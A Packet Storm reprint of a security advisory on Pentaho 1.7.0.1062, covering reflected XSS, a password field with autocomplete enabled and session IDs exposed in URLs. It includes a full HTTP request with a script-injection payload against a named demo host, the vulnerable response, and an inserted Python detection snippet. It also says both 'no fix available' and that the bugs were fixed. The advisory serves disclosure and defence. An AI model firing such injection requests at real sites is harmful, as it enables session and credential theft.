
Pentaho 1.7.0.1062 XSS / Disclosure

Posted Oct 15, 2009
Authored by euronymous

Pentaho version 1.7.0.1062 and below suffer from cross site scripting and disclosure vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 49597cb26cd53ef0182ae67b4e95514579433cf0c35d17be9d1532ca908e5593

Pentaho 1.7.0.1062 Multiple Vulnerabilities

 Name              Multiple Vulnerabilities in Pentaho
 Systems Affected  Pentaho <= 1.7.0.1062
 Severity          High
 Impact (CVSSv2)   High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Vendor            http://www.pentaho.com
 Advisory          http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
 Authors           Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)
 Date              20081224

I. BACKGROUND
Pentaho Analysis puts rich, analytic power in the hands of your business users
helping them gain the insights and understanding they need to make optimal
business decisions.

II. DESCRIPTION

Multiple vulnerabilities exist in Pentaho.

III. ANALYSIS

Summary:

 A) Reflected XSS
 B) Password field with autocomplete enabled
 C) Disclosure of Session Tokens in URL


A) Reflected XSS

The presence of Cross Site Scripting has been verified on /pentaho/ViewAction
parameters. The attacker-supplied code can perform different actions, such as
stealing the victim's session token or login credentials, performing arbitrary
actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways.
For example, an attacker can send the victim a malicious URL in an email or
instant message, or submit the link to popular web applications that don't
escape HTML characters such as <>'\().

An example is the following:

GET /pentaho/ViewAction?&outputType=khgj345<script>alert('Pwnd')</script>kjh3535&solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
Host: demo1.opentaps.org:8181
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: it-IT,it;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path=Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
Cookie2: $Version=1
Proxy-Connection: Keep-Alive

When the request is executed, a popup showing the string Pwnd appears, because the
rejected parameter value is echoed into the error page without HTML encoding.
Here is the response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
Content-Length: 1615
Date: Wed, 24 Dec 2008 09:55:32 GMT
Connection: close

<html><head><title>Pentaho BI Platform - Error in Action</title>
<link rel="stylesheet" type="text/css" href="/pentaho-style/active/default.css"></head>
<body dir="LTR"><table cellspacing="10">
<tr><td class="portlet-section" colspan="3">Failed<hr size="1"/></td></tr>
<tr><td class="portlet-font" valign="top"><span style="color:red">Errore: SecureFilterComponent.ERROR_0001 - "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione consentita "outputType" per questo utente (org.pentaho.plugin.core.SecureFilterComponent)</span><p/>
Debug: Partenza dellesecuzione di {0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)<br/>
Debug: Lettura del contesto a runtime e dei dati (org.pentaho.core.solution.SolutionEngine)<br/>
Debug: Caricamento del file di configurazione dell'Action Sequence (org.pentaho.core.solution.SolutionEngine)<br/>
Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409, objectId=org.pentaho.core.runtime.RuntimeContext, messageType=action_sequence_start (org.pentaho.core.runtime.RuntimeContext)<br/>
Errore: SecureFilterComponent.ERROR_0001 - "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione consentita "outputType" per questo utente (org.pentaho.plugin.core.SecureFilterComponent)<br/>
Errore: RuntimeContext.ERROR_0012 - LActionDefinition per {0} non è stata eseguita con successo (org.pentaho.core.runtime.RuntimeContext)<br/>
Errore: SolutionEngine.ERROR_0007 - Esecuzione dell'Action Sequence fallita (org.pentaho.core.solution.SolutionEngine)<br/></td></tr></table>
<p>&nbsp;&nbsp;[it_41] Server Version Pentaho BI Platform 1.7.0.1062</body></html>


The same servlet, /pentaho/ViewAction, has two other parameters that are
vulnerable to reflected XSS in the same way: "action" and "path".


B) Password field with autocomplete enabled

The response to this request:

GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7

contains the login form where credentials are passed to the application.
 [...]
 <tr>
    <td colspan="2"><input type='password' name='j_password' size="30" ></td>
 </tr>
 [...]

The problem is that the autocomplete attribute is not set to off. We recommend
setting it, especially given the presence of reflected XSS, which in this
situation can be exploited to retrieve the password input from the browser
history.


C) Disclosure of Session Tokens in URL
The web application session identifier, JSESSIONID, is disclosed in the URL.
This is a bad practice because this sensitive information becomes visible in
the client browser history, in the Referer header, and in bookmarks.

An example:
http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C182994F71355BE8A38605396B1



IV. DETECTION

1.7.0.1062 and earlier versions are vulnerable.

V. WORKAROUND

Proper input validation and session management will fix the vulnerabilities.
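As an added example (not part of the advisory), a small Python audit that checks captured requests and responses for the three issues above: a query parameter echoed unencoded into the response (A), a password field without autocomplete="off" (B), and a JSESSIONID carried in the URL (C), plus the HTML-encoding step that the workaround's "proper input validation" implies. The sample request, response fragment and login form are constructed from the advisory's own data, and the session id is a placeholder.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples modelled on the advisory's request and response; the
# session id below is a placeholder, not a real token.
SAMPLE_URL = ("http://demo1.opentaps.org:8181/pentaho/ViewAction?&outputType="
              "khgj345<script>alert('Pwnd')</script>kjh3535&solution=opentaps"
              "&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis")
SAMPLE_BODY = ('<span style="color:red">Errore: SecureFilterComponent.ERROR_0001 - '
               '"khgj345<script>alert(\'Pwnd\')</script>kjh3535" non è una '
               'selezione consentita "outputType"</span>')
SAMPLE_LOGIN = "<tr><td><input type='password' name='j_password' size=\"30\" ></td></tr>"
SAMPLE_LOGIN_URL = "http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=PLACEHOLDER_ID"


def reflected_params(url, body):
    """Names of query parameters whose raw value is echoed unencoded in body.
    Only values carrying HTML metacharacters count, so a benign echo such as
    solution=opentaps is not reported."""
    hits = set()
    for name, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            if (re.search(r"""[<>'"]""", value) and value in body
                    and html.escape(value, quote=True) not in body):
                hits.add(name)
    return sorted(hits)


def password_fields_missing_autocomplete_off(markup):
    """Password <input> tags that do not carry autocomplete="off"."""
    tags = re.findall(r"<input\b[^>]*>", markup, flags=re.I)
    return [t for t in tags
            if re.search(r"""type\s*=\s*['"]?password""", t, re.I)
            and not re.search(r"""autocomplete\s*=\s*['"]?off""", t, re.I)]


def session_id_in_url(url):
    """True when a JSESSIONID travels as a URL path parameter (;jsessionid=...)."""
    return re.search(r";jsessionid=[^;/?#]+", url, re.I) is not None


def safe_error_message(value):
    """The fix for A): HTML-encode an untrusted value before reflecting it."""
    return html.escape(value, quote=True)
```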

VI. VENDOR RESPONSE

No fix available.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20081224 Initial vendor contact
20081229 Second vendor contact
20090120 Bugs have been assigned to developers
20090619 Bugs have been finally fixed


IX. CREDIT

Michele "euronymous" Orru'

X. LEGAL NOTICES

Copyright (c) 2008 Michele "euronymous" Orru'

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronic,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
© 2024 Packet Storm. All rights reserved.